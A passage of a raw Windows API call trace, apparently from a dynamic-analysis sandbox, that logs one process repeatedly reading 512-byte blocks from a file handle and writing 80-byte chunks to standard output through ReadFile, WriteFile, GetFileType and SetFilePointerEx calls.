[0096.328] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.328] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) 
returned 1 [0096.328] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.328] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.328] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.328] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.329] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.329] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.329] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.329] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, 
lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.330] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.330] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] GetFileType (hFile=0x4c) returned 0x1 [0096.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.330] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] GetFileType (hFile=0x4c) returned 0x1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] GetFileType (hFile=0x4c) returned 0x1 [0096.331] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] GetFileType (hFile=0x4c) returned 0x1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] GetFileType (hFile=0x4c) returned 0x1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] GetFileType (hFile=0x4c) returned 0x1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] GetFileType (hFile=0x4c) returned 0x1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.331] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.331] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.331] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, 
lpOverlapped=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] GetFileType (hFile=0x4c) returned 0x1 [0096.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.332] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.332] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.332] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.332] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] WriteFile (in: hFile=0x4c, 
lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] GetFileType (hFile=0x4c) returned 0x1 [0096.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.333] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.333] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.333] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.334] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] GetFileType (hFile=0x4c) returned 0x1 [0096.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.334] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.334] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.334] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.334] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: 
